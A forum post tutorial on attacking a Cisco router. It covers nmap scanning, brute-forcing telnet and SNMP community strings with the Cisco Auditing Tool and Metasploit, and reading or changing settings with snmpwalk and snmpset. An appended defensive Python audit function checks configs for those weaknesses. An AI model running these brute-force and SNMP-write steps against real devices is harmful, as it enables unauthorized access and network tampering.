Post Fri Aug 12, 2016 1:38 am

Simple Attack on a Cisco Router

Hello everybody,

I want to share a simple way to attack a router, in this case a Cisco router.

First we must scan with nmap; we can combine TCP and UDP.

We hope the router has remote access (TCP) and SNMP (UDP) ports open.

Use Backtrack or Kali Linux :
nmap -sS -sU -T5

29954U@root:/pentest/cisco$ nmap -sS -sU -T5

Starting Nmap 5.59BETA1 ( ) at 2012-05-12 09:04 EDT
Warning: giving up on port because retransmission cap hit (2).
Nmap scan report for
Host is up (0.0022s latency).
Not shown: 1248 closed ports, 749 open|filtered ports
23/tcp open telnet
79/tcp open finger
161/udp open snmp
MAC Address: 00:02:FD:60:77:20 (Cisco Systems)

Then you can see that ports 23/tcp and 161/udp are open, so we can attack now.

Telnet: we can brute-force using hydra or Cisco tools.

29954U@root:/pentest/cisco/cisco-auditing-tool$ ./CAT -h -w /pentest/passwords/john/password.lst

Cisco Auditing Tool - g0ne [null0]

Checking Host:

Guessing passwords:

Invalid Password: cisco
Invalid Password: ciscos
Invalid Password: cisco1
Invalid Password: router

Now you can brute-force SNMP with msfconsole:

msf > use auxiliary/scanner/snmp/snmp_login
msf auxiliary(snmp_login) > set RHOSTS
rhosts =>
msf auxiliary(snmp_login) > set THREADS 3
threads => 3
msf auxiliary(snmp_login) > exploit

If it succeeds, you can see the read and write community strings...

You can run the command:

snmpwalk -mALL -v1 -c public

Or, if you must exploit it, you can change values with:

snmpset -c ILMI -v 2c i 1

All the techniques for making changes can be found in the snmpset wiki.

Detail Lab :
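
From the defender's side, every step in the post depends on settings that are visible in the router's own configuration: telnet on the vty lines, the finger service, and guessable or read-write SNMP community strings. The following is an added example, not part of the original post; it assumes classic Cisco IOS config syntax, and the function name, the sample config and the extra "private" community are assumptions made for illustration.

```python
import re

# "public" and "ILMI" are the community strings in the post; "private" is an
# assumed extra default. Config syntax is assumed to be classic Cisco IOS.
GUESSABLE = {"public", "private", "ilmi"}

def audit_ios_config(config):
    """Return findings for the services the post probes: telnet, finger, SNMP."""
    findings = []
    vty, transport = None, None

    def close_vty():
        if vty is None:
            return
        if transport is None:
            findings.append(f"{vty}: no 'transport input', telnet may be accepted")
        elif {"telnet", "all"} & set(transport):
            findings.append(f"{vty}: telnet allowed, use 'transport input ssh'")

    for raw in config.splitlines():
        line = raw.strip()
        if not raw.startswith(" "):      # a non-indented line ends an open vty block
            close_vty()
            vty, transport = None, None
        if line.startswith("line vty"):
            vty = line
        elif vty and line.startswith("transport input"):
            transport = line.split()[2:]
        elif line in ("ip finger", "service finger"):
            findings.append("finger enabled, use 'no ip finger'")
        elif m := re.match(r"snmp-server community (\S+)(.*)", line):
            # Drop the optional "view NAME" so only RO/RW and the ACL remain.
            name, rest = m.group(1), re.sub(r"\bview \S+", "", m.group(2)).split()
            acl = [t for t in rest if t.upper() not in ("RO", "RW")]
            if name.lower() in GUESSABLE:
                findings.append(f"snmp '{name}': guessable community string")
            if "RW" in (t.upper() for t in rest):
                findings.append(f"snmp '{name}': read-write, allows snmpset")
            if not acl:
                findings.append(f"snmp '{name}': no ACL limits who may query")
    close_vty()
    return findings

# Constructed sample config, not taken from a real device.
SAMPLE = """ip finger
snmp-server community public RO
snmp-server community ILMI RW
line vty 0 4
 transport input telnet
"""
```

Running `audit_ios_config(SAMPLE)` reports the finger service, both community strings and the telnet-enabled vty block; a config with `no ip finger`, an ACL-bound non-default community and `transport input ssh` returns no findings.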